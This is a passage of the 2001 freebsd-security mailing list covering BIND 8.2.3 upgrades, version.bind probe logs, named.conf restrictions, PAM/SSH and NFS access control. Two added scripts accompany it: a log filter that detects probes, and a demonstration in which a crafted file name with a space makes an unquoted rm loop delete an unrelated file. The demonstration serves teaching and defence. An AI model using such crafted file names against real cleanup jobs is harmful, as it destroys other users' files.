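Added example, not from the thread: it runs the same file names through the original for-loop, the -exec form Sheldon gives, and the -print0 | xargs -0 form Gerhard proposes, in a scratch directory standing in for /tmp. Assumptions: the -ctime test is dropped so the files match immediately, and the loop is run from inside the scratch directory so that the second word of the attacker-chosen name resolves there.

```shell
#!/bin/sh
# Demonstrates the word-splitting bug in
#   for i in `find /tmp -name 'krb5cc_*' -print`; do rm -f $i; done
# and that the -exec and -print0|xargs -0 replacements do not share it.

# Constructed scratch directory (stands in for /tmp). Prints its path.
setup_scratch() {
    d=$(mktemp -d) || exit 1
    touch "$d/krb5cc_1000"          # a genuine stale ticket cache
    touch "$d/bystander"            # an unrelated file that must survive
    touch "$d/krb5cc_1 bystander"   # pattern + space + a victim's name
    printf '%s\n' "$d"
}

# Original (unsafe) variant. Unquoted expansion splits
# "./krb5cc_1 bystander" into "./krb5cc_1" and "bystander", and the
# second word names the unrelated file in the current directory.
unsafe_cleanup() {
    ( cd "$1" && for i in $(find . -name 'krb5cc_*' -print); do rm -f $i; done )
}

# Safe variant 1: -exec hands each path to rm as one argument.
safe_cleanup_exec() {
    find "$1" -name 'krb5cc_*' -exec rm -f {} \;
}

# Safe variant 2: NUL-separated names; one rm for many files.
safe_cleanup_xargs() {
    find "$1" -name 'krb5cc_*' -print0 | xargs -0 rm -f
}

# Exit status 0 if the unrelated file is still present in directory $1.
bystander_survived() {
    [ -e "$1/bystander" ]
}

# Stand-alone demonstration of the unsafe loop.
demo_dir=$(setup_scratch)
unsafe_cleanup "$demo_dir"
if bystander_survived "$demo_dir"; then
    echo "unsafe loop: bystander kept"
else
    echo "unsafe loop: bystander DELETED"   # this is what happens
fi
rm -rf "$demo_dir"
```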
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 30 11:12:39 2001 Delivered-To: freebsd-security@freebsd.org Received: from mailman.sprintlabs.com (mx.sprintlabs.com [208.30.174.2]) by hub.freebsd.org (Postfix) with ESMTP id 5027B37B6AA for ; Tue, 30 Jan 2001 11:12:20 -0800 (PST) Received: by mailman.sprintlabs.com with Internet Mail Service (5.5.2652.78) id ; Tue, 30 Jan 2001 11:12:18 -0800 Received: from sprintlabs.com (ip199-2-53-135.sprintlabs.com [199.2.53.135]) by mailman.sprintlabs.com with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2652.78) id DZL7240Z; Tue, 30 Jan 2001 11:12:09 -0800 
From: Steven Davidson Reply-To: Steven Davidson To: Sam Wun Cc: freebsd-security@freebsd.org Message-ID: <3A7713B7.EFCA95EB@sprintlabs.com> Date: Tue, 30 Jan 2001 11:19:19 -0800 X-Mailer: Mozilla 4.76 [en] (X11; U; FreeBSD 4.1.1-RELEASE i386) X-Accept-Language: en MIME-Version: 1.0 Subject: Re: NFS security References: <20010129045116.A5564@crow.dom2ip.de> <3A7502CF.D5172D9D@esec.com.au> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Sam Wun wrote: > Hi, > > Does anyone knows how to setup NFS trust like the one in Solaris 8 in FreeBSD? > > Thanks Sam. > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message If, by NFS trust, you mean secureRPC than you are mostly out of luck. Although FreeBSD supports secureRPC, it doesn't apply to NFS. You can map all remote users to "nobody" or even "somebody" but real NFS authentication is non-existent. Perhaps kerberos will provide a solution. Also, you can wait for NFSv4. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 30 11:30:28 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.sageian.com (ns.sage-consult.com [208.201.118.11]) by hub.freebsd.org (Postfix) with ESMTP id 94C2937B6AA for ; Tue, 30 Jan 2001 11:30:06 -0800 (PST) Received: from pricli012 (proxy.sageian.com [208.201.118.126]) by mail.sageian.com (Postfix) with SMTP id 66CD16A904; Tue, 30 Jan 2001 14:30:05 -0500 (EST) Message-ID: <013d01c08af3$1fd80270$4c00000a@sage> Reply-To: "Rossen Raykov" 
From: "Rossen Raykov" To: Cc: References: <20010130180717.62674.qmail@web9303.mail.yahoo.com> Subject: Re: bind8.2.3 port Date: Tue, 30 Jan 2001 14:30:38 -0500 Organization: SageConsult, Princeton MIME-Version: 1.0 Content-Type: text/plain; charset="windows-1251" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

The port from www.freshports.org works fine for me. Everything compiled the first time. I received errors only during package registration after install. Even after that the new bind is working fine (I'm running it in a chroot environment).

The only thing that bothers me is the reported version:

bash$ nslookup -q=txt -class=CHAOS version.bind. 0
Server:  server.com
Address:  0.0.0.0

VERSION.BIND    text = "8.2.3-REL"

I hope this is not vulnerable. Can someone confirm that?

Thanks,
Rossen

----- Original Message -----
From: To: Cc: Sent: Tuesday, January 30, 2001 1:07 PM Subject: Re: bind8.2.3 port > You can download that port from www.freshports.org or > www.freebsd.org/ports > But I think there is a compilation problem with it.I > am not sure but I have tried to compile that port 4 > times with the same source code.It has given me errors > everytime and all of them was in different .c > file.Weird isn't it.And after compiling it.I made a > reboot but sysctl command and some of my system > command started to give core dumps.I am not sure > bind8.2.3 port is the reason for that any feedback ??? > > > > --- Rossen Raykov wrote: > > Hi, > > > > Form where I can get bind8.2.3 port? > > I found only bind-8.2.2.p7.tgz and bind-9.1.0.tgz > > in > > > ftp://ftp.freebsd.org/pub/FreeBSD/ports/i386/packages-4-stable/All/ > > > > Thanks, > > > > Rossen > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of > > the message > > > __________________________________________________ > Get personalized email addresses from Yahoo! Mail - only $35 > a year! http://personal.mail.yahoo.com/ > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 30 11:51:34 2001 Delivered-To: freebsd-security@freebsd.org Received: from pozitif.net (unknown [213.194.71.201]) by hub.freebsd.org (Postfix) with SMTP id 6B7BE37B6BB for ; Tue, 30 Jan 2001 11:51:14 -0800 (PST) Received: from pozitif.net ([212.253.52.107]) by pozitif.net ; Tue, 30 Jan 2001 21:59:27 +0200 Message-ID: <3A771B39.69D774BB@pozitif.net> Date: Tue, 30 Jan 2001 21:51:22 +0200 
From: Mehmet Hinc X-Mailer: Mozilla 4.76 [en] (X11; U; FreeBSD 4.2-RELEASE i386) X-Accept-Language: en MIME-Version: 1.0 To: freebsd-security@freebsd.org Subject: Bind8.2.3 and installation Problem Solved Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Thanks for everyone who interested it , and I solved my problem.(happy now :PP) Thanks Mehmet Hinc from TURKEY To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 30 11:56: 6 2001 Delivered-To: freebsd-security@freebsd.org Received: from ducky.nz.freebsd.org (ns1.unixathome.org [203.79.82.27]) by hub.freebsd.org (Postfix) with ESMTP id 70D5F37B6BB for ; Tue, 30 Jan 2001 11:55:47 -0800 (PST) Received: from wocker (wocker.int.nz.freebsd.org [192.168.0.99]) by ducky.nz.freebsd.org (8.9.3/8.9.3) with ESMTP id IAA67144; Wed, 31 Jan 2001 08:55:42 +1300 (NZDT) Message-Id: <200101301955.IAA67144@ducky.nz.freebsd.org> 
From: "Dan Langille" Organization: novice in training To: "Crist J. Clark" Date: Wed, 31 Jan 2001 08:55:31 +1300 MIME-Version: 1.0 Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Subject: Re: bind8.2.3 and installation problem Reply-To: dan@langille.org Cc: security@FreeBSD.ORG In-reply-to: <20010130083928.K91447@rfx-216-196-73-168.users.reflex> References: <200101301138.AAA64905@ducky.nz.freebsd.org>; from dan@langille.org on Wed, Jan 31, 2001 at 12:38:28AM +1300 X-mailer: Pegasus Mail for Win32 (v3.12c) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

On 30 Jan 2001, at 8:39, Crist J. Clark wrote:

> On Wed, Jan 31, 2001 at 12:38:28AM +1300, Dan Langille wrote:
> > On 30 Jan 2001, at 1:26, Crist J. Clark wrote:
> >
> > > > It can't be that simple!
> > >
> > > I hate to break it to you (I guess?), but it is. I did it on my
> > > CURRENT box for testing and it clobbered the old BIND quite nicely.
> > > Before,
> > >
> > > bubbles# ls -l /usr/sbin/named
> > > -r-xr-xr-x  1 root  wheel  501408 Jan 18 13:17 /usr/sbin/named
> > >
> > > After,
> > >
> > > bubbles# !ls
> > > ls -l /usr/sbin/named
> > > -rwxr-xr-x  1 root  wheel  595752 Jan 30 01:22 /usr/sbin/named
> > >
> > > Like I said, PREFIX rocks.
> >
> > I actually tried: make PREFIX=/usr DESTETC=/etc install
> >
> > The only catch was needing to have /etc/name.conf, so I created a
> > symlink:
> >
> > # ln -s /etc/named.conf /etc/namedb/named.conf
> >
> > I'll do more testing in the morning....
>
> True, FreeBSD uses,
>
> DESTETC= /etc/namedb
>
> If you really want to mimic the FreeBSD install, look at the Makefiles
> in /usr/src/usr.sbin/named.

Thanks. For those that want to know, and I know you're out there:

make PREFIX=/usr PIDDIR=/var/run DESTETC=/etc/namedb DESTEXEC=/usr/libexec DESTRUN=/var/run DESTSBIN=/usr/sbin DESTHELP=/usr/share/misc install

I didn't use any of the other options...

After the install, the /etc/named.conf symlink was no longer needed.
ndc reload seems to be fine. I'll do some more testing later (there's not actually any zones loaded on this box). -- Dan Langille pgpkey - finger dan@unixathome.org | http://unixathome.org/finger.php To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 30 12:44:22 2001 Delivered-To: freebsd-security@freebsd.org Received: from arjun.niksun.com (unknown [63.148.27.34]) by hub.freebsd.org (Postfix) with ESMTP id DD3EB37B69E for ; Tue, 30 Jan 2001 12:44:04 -0800 (PST) Received: from stiegl.niksun.com (stiegl.niksun.com [10.0.0.44]) by arjun.niksun.com (8.9.3/8.9.3) with ESMTP id PAA42392; Tue, 30 Jan 2001 15:42:44 -0500 (EST) (envelope-from ath@stiegl.niksun.com) Received: (from ath@localhost) by stiegl.niksun.com (8.9.2/8.8.7) id PAA69019; Tue, 30 Jan 2001 15:44:03 -0500 (EST) (envelope-from ath) To: dan@langille.org Cc: "Crist J. Clark" , security@FreeBSD.ORG Subject: Re: bind8.2.3 and installation problem References: <200101301138.AAA64905@ducky.nz.freebsd.org>; from dan@langille.org on Wed, Jan 31, 2001 at 12:38:28AM +1300 <200101301955.IAA67144@ducky.nz.freebsd.org> 
From: Andrew Heybey Date: 30 Jan 2001 15:44:02 -0500 In-Reply-To: "Dan Langille"'s message of "Wed, 31 Jan 2001 08:55:31 +1300" Message-ID: <85snm0rcrx.fsf@stiegl.niksun.com> Lines: 22 X-Mailer: Gnus v5.5/XEmacs 20.4 - "Emerald" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > Thanks. For those that want to know, and I know you're out there: > > make PREFIX=/usr PIDDIR=/var/run DESTETC=/etc/namedb > DESTEXEC=/usr/libexec DESTRUN=/var/run DESTSBIN=/usr/sbin > DESTHELP=/usr/share/misc install > > I didn't use any of the other options... > > After the install, the /etc/named.conf symlink was no longer needed. > ndc reload seems to be fine. I'll do some more testing later (there's not > actually any zones loaded on this box). Thanks to all for the makefile research (and for posting the results). As a minor tip, I note that if you use the port as opposed to selectively upgrading via /usr/src then you: 1. Have a record in /var/db/pkg that the fix was applied. 2. Can easily make a binary package that can be simply pkg_add'ed on systems without source (I have tried it on 3.2 and 4.2). andrew To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 30 13:26:25 2001 Delivered-To: freebsd-security@freebsd.org Received: from ducky.nz.freebsd.org (ns1.unixathome.org [203.79.82.27]) by hub.freebsd.org (Postfix) with ESMTP id 847AB37B6AC for ; Tue, 30 Jan 2001 13:25:42 -0800 (PST) Received: from wocker (wocker.int.nz.freebsd.org [192.168.0.99]) by ducky.nz.freebsd.org (8.9.3/8.9.3) with ESMTP id KAA67777; Wed, 31 Jan 2001 10:25:35 +1300 (NZDT) Message-Id: <200101302125.KAA67777@ducky.nz.freebsd.org> 
From: "Dan Langille" Organization: novice in training To: Andrew Heybey Date: Wed, 31 Jan 2001 10:25:41 +1300 MIME-Version: 1.0 Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Subject: Re: bind8.2.3 and installation problem Reply-To: dan@langille.org Cc: security@FreeBSD.ORG References: "Dan Langille"'s message of "Wed, 31 Jan 2001 08:55:31 +1300" In-reply-to: <85snm0rcrx.fsf@stiegl.niksun.com> X-mailer: Pegasus Mail for Win32 (v3.12c) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 30 Jan 2001, at 15:44, Andrew Heybey wrote: > 2. Can easily make a binary package that can be simply pkg_add'ed on systems > without source (I have tried it on 3.2 and 4.2). That's a good point Andrew. I compiled bind on a dual XEON, then did a make package, and copied the tarball to my DNS server and did a pkg_add. This process took about 10 minutes from start to finish. To do that on my DNS server (which is a 486) would have taken hours. note: remember to use the same make options at all stages of the process. e.g. 
# make PREFIX=/usr PIDDIR=/var/run DESTETC=/etc/namedb DESTEXEC=/usr/libexec DESTRUN=/var/run DESTSBIN=/usr/sbin DESTHELP=/usr/share/misc install
# make PREFIX=/usr PIDDIR=/var/run DESTETC=/etc/namedb DESTEXEC=/usr/libexec DESTRUN=/var/run DESTSBIN=/usr/sbin DESTHELP=/usr/share/misc package

cheers
-- Dan Langille pgpkey - finger dan@unixathome.org | http://unixathome.org/finger.php

From owner-freebsd-security Tue Jan 30 13:56:47 2001 Delivered-To: freebsd-security@freebsd.org Received: from merton.slipstreams.net (owirc.com [208.45.226.107]) by hub.freebsd.org (Postfix) with ESMTP id 0159E37B6B0; Tue, 30 Jan 2001 13:56:30 -0800 (PST) Received: from cc481952a (arcane.slipstreams.net [192.168.1.1]) by merton.slipstreams.net (8.11.1/8.11.1) with SMTP id f0UE4Eq80917; Tue, 30 Jan 2001 14:04:14 GMT (envelope-from kupek@earthlink.net) From: "Scott Hilton" To: "Kris Kennaway" Cc: Subject: RE: [COVERT-2001-01] Multiple Vulnerabilities in BIND - FreeBSD Implications ? Date: Tue, 30 Jan 2001 13:56:14 -0800 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300 Importance: Normal In-Reply-To: <20010129172540.B1562@citusc17.usc.edu> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

To those that want to upgrade to 8.2.3-REL before the official FreeBSD advisories are released, if you are already running 4.2-STABLE, it's only a matter of uncompressing the tarball from ftp.isc.org, and doing a 'make install'. There don't appear to be any conflicts with any pathnames changing (at least none that I could see).

Scott

-----Original Message-----
From: owner-freebsd-security@FreeBSD.ORG [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Kris Kennaway Sent: Monday, January 29, 2001 5:26 PM To: Remy Wisaksono Cc: freebsd-security@FreeBSD.ORG Subject: Re: [COVERT-2001-01] Multiple Vulnerabilities in BIND - FreeBSD Implications ?

On Mon, Jan 29, 2001 at 08:02:11PM -0500, Remy Wisaksono wrote:
>
> I upgraded my bind8.2.3-T6B and when typing
> "named -v" command, I get the 8.2.3-T6B ver.
>
> When typing the following command,
> "nslookup -q=txt -class=CHAOS version.bind. 0"
> I got;
> VERSION.BIND    text = "8.2.3-REL"
>
> (also I did check my log file ....everything looks good now.)

Well, it seems you didn't actually upgrade it properly :-)

Kris

From owner-freebsd-security Tue Jan 30 14: 0:47 2001 Delivered-To: freebsd-security@freebsd.org Received: from merton.slipstreams.net (owirc.com [208.45.226.107]) by hub.freebsd.org (Postfix) with ESMTP id 209A237B6B4 for ; Tue, 30 Jan 2001 14:00:24 -0800 (PST) Received: from cc481952a (arcane.slipstreams.net [192.168.1.1]) by merton.slipstreams.net (8.11.1/8.11.1) with SMTP id f0UE88q80963 for ; Tue, 30 Jan 2001 14:08:09 GMT (envelope-from kupek@earthlink.net)
From: "Scott Hilton" To: Subject: RE: [COVERT-2001-01] Multiple Vulnerabilities in BIND - FreeBSD Implications ? Date: Tue, 30 Jan 2001 14:00:09 -0800 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300 Importance: Normal In-Reply-To: Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org heh.. it would help if I actually bothered to read all of the new messages in my box before posting this... As Kris mentioned in a different thread, the bind port has also been updated as well (duh). Scott -----Original Message----- From: owner-freebsd-security@FreeBSD.ORG [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Scott Hilton Sent: Tuesday, January 30, 2001 1:56 PM To: Kris Kennaway Cc: freebsd-security@FreeBSD.ORG Subject: RE: [COVERT-2001-01] Multiple Vulnerabilities in BIND - FreeBSD Implications ? To those that want to upgrade to 8.2.3-REL before the official FreeBSD advisories are released, if you are already running 4.2-STABLE, its only a matter of uncompressing the tarball from ftp.isc.org, and doing a 'make install'. There don't appear to be any conflicts with any pathnames changing (at least none that I could see). Scott -----Original Message----- 
From: owner-freebsd-security@FreeBSD.ORG [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Kris Kennaway Sent: Monday, January 29, 2001 5:26 PM To: Remy Wisaksono Cc: freebsd-security@FreeBSD.ORG Subject: Re: [COVERT-2001-01] Multiple Vulnerabilities in BIND - FreeBSD Implications ? On Mon, Jan 29, 2001 at 08:02:11PM -0500, Remy Wisaksono wrote: > > I upgraded my bind8.2.3-T6B and when typing > "named -v" command, I get the 8.2.3-T6B ver. > > When typing the following comman, > "nslookup -q=txt -class=CHAOS version.bind. 0" > I got; > VERSION.BIND text = "8.2.3-REL" > > (also I did check my log file ....everyting looks good now.) Well, it seems you didn't actually upgrade it properly :-) Kris To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 30 14:47:13 2001 Delivered-To: freebsd-security@freebsd.org Received: from cowpie.acm.vt.edu (cowpie.acm.vt.edu [128.173.42.253]) by hub.freebsd.org (Postfix) with ESMTP id A30EB37B6CB for ; Tue, 30 Jan 2001 14:46:53 -0800 (PST) Received: (from dlacroix@localhost) by cowpie.acm.vt.edu (8.9.3/8.9.3) id RAA12443; Tue, 30 Jan 2001 17:45:04 -0500 (EST) 
From: David La Croix Message-Id: <200101302245.RAA12443@cowpie.acm.vt.edu> Subject: Bind: unapproved query (version.bind) Script kiddies? To: freebsd-security@freebsd.org Date: Tue, 30 Jan 2001 16:45:04 -0600 (CST) X-Mailer: ELM [version 2.4ME+ PL38 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

I just noticed the following in my logfiles: (/var/log/messages)

it was running Bind 8.2.2-

Jan 26 22:37:43 mildred named[41908]: unapproved query from [208.44.147.11].1584 for "version.bind"
[repeat 23 more times from the same IP]

Jan 27 01:44:42 mildred named[41908]: unapproved query from [208.139.163.15].2734 for "version.bind"
[repeat 32 more times from the same IP]

Could this be script kiddie activity? This was before I upgraded to 8.2.3, and before the CERT alert came out.

What I don't get is why the unapproved query repeated so many times, within (according to the timestamp) 3 seconds on both occasions.

I will note: this activity goes back through about November of 2000, seemingly from different IP addresses.

From owner-freebsd-security Tue Jan 30 14:52:33 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.epylon.com (sf-gw.epylon.com [63.93.9.98]) by hub.freebsd.org (Postfix) with ESMTP id 675CC37B6B7 for ; Tue, 30 Jan 2001 14:52:10 -0800 (PST) Received: by goofy.epylon.lan with Internet Mail Service (5.5.2653.19) id ; Tue, 30 Jan 2001 14:52:09 -0800 Message-ID: <657B20E93E93D4118F9700D0B73CE3EA0243C6@goofy.epylon.lan>
From: Jason DiCioccio To: 'David La Croix' , freebsd-security@freebsd.org Subject: RE: Bind: unapproved query (version.bind) Script kiddies? Date: Tue, 30 Jan 2001 14:52:00 -0800 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2653.19) Content-Type: multipart/mixed; boundary="----_=_NextPart_000_01C08B0F.41411B10" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

I would say it definitely is ;)

- -------
Jason DiCioccio
Evil Genius
Unix BOFH
mailto:jasond@epylon.com
415-593-2761 Direct & Fax
415-593-2900 Main
Epylon Corporation
645 Harrison Street, Suite 200
San Francisco, CA 94107
www.epylon.com

BSD is for people who love Unix -
Linux is for people who hate Microsoft

- -----Original Message-----
From: David La Croix [mailto:dlacroix@cowpie.acm.vt.edu] Sent: Tuesday, January 30, 2001 2:45 PM To: freebsd-security@freebsd.org Subject: Bind: unapproved query (version.bind) Script kiddies?

I just noticed the following in my logfiles: (/var/log/messages)

it was running Bind 8.2.2-

Jan 26 22:37:43 mildred named[41908]: unapproved query from [208.44.147.11].1584 for "version.bind"
[repeat 23 more times from the same IP]

Jan 27 01:44:42 mildred named[41908]: unapproved query from [208.139.163.15].2734 for "version.bind"
[repeat 32 more times from the same IP]

Could this be script kiddie activity? This was before I upgraded to 8.2.3, and before the CERT alert came out.

What I don't get is why the unapproved query repeated so many times, within (according to the timestamp) 3 seconds on both occasions.

I will note: this activity goes back through about November of 2000, seemingly from different IP addresses.
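The "unapproved query ... for version.bind" lines David quotes are what a version sweep looks like from the server side. As an added example that is not part of the thread, here is a small sh/awk filter that pulls the source address out of BIND 8 syslog lines of that shape, counts version.bind probes per address and shows the time span of each burst; the sample log is constructed, with documentation-range addresses.

```shell
#!/bin/sh
# Flag source addresses that probe version.bind repeatedly, from
# BIND 8 "unapproved query" syslog entries.

# Constructed sample log, modelled on the lines quoted in the thread.
SAMPLE_LOG='Jan 26 22:37:41 mildred named[41908]: unapproved query from [192.0.2.10].1584 for "version.bind"
Jan 26 22:37:42 mildred named[41908]: unapproved query from [192.0.2.10].1585 for "version.bind"
Jan 26 22:37:43 mildred named[41908]: unapproved query from [192.0.2.10].1586 for "version.bind"
Jan 27 01:44:42 mildred named[41908]: unapproved query from [198.51.100.7].2734 for "version.bind"
Jan 27 09:12:00 mildred named[41908]: unapproved query from [203.0.113.5].3000 for "example.net"'

# version_probe_sources THRESHOLD < logfile
# Prints "COUNT IP FIRST..LAST" for every address with at least
# THRESHOLD version.bind probes, most active address first.
# Queries for other names (ordinary refused lookups) are ignored.
version_probe_sources() {
    awk -v min="$1" '
        /unapproved query from \[/ && /for "version\.bind"/ {
            # $9 looks like [192.0.2.10].1584 ; keep only the address
            split($9, parts, "]")
            ip = substr(parts[1], 2)
            if (!(ip in first)) first[ip] = $3
            last[ip] = $3
            count[ip]++
        }
        END {
            for (ip in count)
                if (count[ip] >= min)
                    printf "%d %s %s..%s\n", count[ip], ip, first[ip], last[ip]
        }' | sort -rn
}

# Stand-alone run: addresses that probed at least twice.
printf '%s\n' "$SAMPLE_LOG" | version_probe_sources 2
```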

From owner-freebsd-security Tue Jan 30 15:34:51 2001 Delivered-To: freebsd-security@freebsd.org Received: from cowpie.acm.vt.edu (cowpie.acm.vt.edu [128.173.42.253]) by hub.freebsd.org (Postfix) with ESMTP id 73F8037B6D7 for ; Tue, 30 Jan 2001 15:34:33 -0800 (PST) Received: (from dlacroix@localhost) by cowpie.acm.vt.edu (8.9.3/8.9.3) id SAA12914; Tue, 30 Jan 2001 18:32:42 -0500 (EST) From: David La Croix Message-Id: <200101302332.SAA12914@cowpie.acm.vt.edu> Subject: Re: Bind: unapproved query (version.bind) Script kiddies? In-Reply-To: <3A7745E9.ABA027AD@ursine.com> from Michael Bryan at "Jan 30, 1 02:53:29 pm" To: fbsd-secure@ursine.com (Michael Bryan) Date: Tue, 30 Jan 2001 17:32:42 -0600 (CST) Cc: freebsd-security@freebsd.org X-Mailer: ELM [version 2.4ME+ PL38 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

> Almost certainly script kiddies looking to find vulnerable versions of BIND.
> It might be related to the pre-8.2.3 bugs, or it might be earlier bugs that
> they're looking for. Certainly anything before a week or two ago is most likely
> somebody looking for one of the earlier bugs.
> > Out of curiosity, what do you have set up in named.conf (or elsewhere) to
> > block queries for version.bind?

It's not so much blocking queries to version.bind, so much as refusing to
answer queries to an untrusted host, about domains it does not host.

    options {
            directory "/etc/namedb";
            allow-query {
                    127.0.0.1;
                    localnets;
            };
            allow-transfer {
                    0.0.0.0;        /* IPs changed */
                    0.0.0.0;        /* secondary DNS servers */
            };
            forwarders {
                    0.0.0.0; 0.0.0.0;
            };
    };

and then further down all my zone definitions look like:

    zone "mydomain.com" {
            type master;
            file "zones/mydomain.com";
            allow-query { any; };
    };

Basically: refuse queries for any domains I'm not master or slave for, and
only allow domain transfers to the known/trusted secondary nameservers for my
domains.  (As far as you can trust based on IP address.)

I'm sure others have even more restrictive setups that work.  (Require keys
to do zone transfers, listen on only one IP address, etc.)

From: Robert Watson
To: green@FreeBSD.org
Cc: security@FreeBSD.org
Date: Tue, 30 Jan 2001 19:30:57 -0500 (EST)
Subject: PAM/SSH and KerberosIV?
I notice that as part of the PAM/OpenSSH support, the following lines were
added to the pam.conf on -STABLE:

    # OpenSSH with PAM support requires similar modules.  The session one is
    # a bit strange, though...
    sshd    auth    sufficient      pam_skey.so
    sshd    auth    required        pam_unix.so             try_first_pass
    sshd    session required        pam_permit.so

For most sets of entries, there's also a kerberos line (witness login):

    # If the user can authenticate with S/Key, that's sufficient; allow clear
    # password.  Try kerberos, then try plain unix password.
    login   auth    sufficient      pam_skey.so
    login   auth    requisite       pam_cleartext_pass_ok.so
    #login  auth    sufficient      pam_kerberosIV.so       try_first_pass
    login   auth    required        pam_unix.so             try_first_pass

Which gets un-commented for Kerberos sites.  Could you comment on whether or
not a similar looking line is required for use with KerberosIV and OpenSSH?

Robert N M Watson             FreeBSD Core Team, TrustedBSD Project
robert@fledge.watson.org      NAI Labs, Safeport Network Services

From: "Brian F. Feldman"
To: Robert Watson
Cc: green@FreeBSD.org, security@FreeBSD.org
Date: Tue, 30 Jan 2001 19:49:01 -0500
Subject: Re: PAM/SSH and KerberosIV?

Robert Watson wrote:
>
> I notice that as part of the PAM/OpenSSH support, the following lines were
> added to the pam.conf on -STABLE:
>
>     # OpenSSH with PAM support requires similar modules.  The session one is
>     # a bit strange, though...
>     sshd    auth    sufficient      pam_skey.so
>     sshd    auth    required        pam_unix.so             try_first_pass
>     sshd    session required        pam_permit.so
>
> For most sets of entries, there's also a kerberos line (witness login):
>
>     # If the user can authenticate with S/Key, that's sufficient; allow clear
>     # password.  Try kerberos, then try plain unix password.
>     login   auth    sufficient      pam_skey.so
>     login   auth    requisite       pam_cleartext_pass_ok.so
>     #login  auth    sufficient      pam_kerberosIV.so       try_first_pass
>     login   auth    required        pam_unix.so             try_first_pass
>
> Which gets un-commented for Kerberos sites.  Could you comment on whether
> or not a similar looking line is required for use with KerberosIV and
> OpenSSH?

I don't know.  I do not have the capacity to test Kerberos without going
through the trouble of setting it up for myself only on my own computer,
which would be an exercise in utterly profound useless effort.  So, anyone
who does it, let me know if it works for you and how.

BTW, you ever test the make-ssh-use-/dev/tty-to-ask-for-OTP patch?

--
Brian Fundakowski Feldman           \  FreeBSD: The Power to Serve!  /
 green@FreeBSD.org                    `------------------------------'

From: Gerald Pfeifer
Date: Wed, 31 Jan 2001 02:10:19 +0100 (CET)
Subject: nfsd lacks support for tcp_wrapper

Unless we completely missed something, nfsd does lack support for
tcp_wrapper, doesn't it?

As NFS is rather critical security-wise, this seems like a big omission.

(Many sites, like ours, just cannot avoid using NFS, so it would be nice to
be able to easily restrict the address range clients are allowed to connect
from.)

Or are we just missing something?
Gerald
--
Gerald "Jerry" pfeifer@dbai.tuwien.ac.at http://www.dbai.tuwien.ac.at/~pfeifer/

From: Alfred Perlstein
To: Gerald Pfeifer
Cc: freebsd-security@FreeBSD.ORG, admin@dbai.tuwien.ac.at
Date: Tue, 30 Jan 2001 17:26:18 -0800
Subject: Re: nfsd lacks support for tcp_wrapper

* Gerald Pfeifer [010130 17:10] wrote:
> Unless we completely missed something, nfsd does lack support for
> tcp_wrapper, doesn't it?
>
> As NFS is rather critical security-wise, this seems like a big omission.
>
> (Many sites, like ours, just cannot avoid using NFS, so it would be nice
> to be able to easily restrict the address range clients are allowed to
> connect from.)
>
> Or are we just missing something?

Missing the fact that nfsd is an in-kernel process and therefore pretty hard
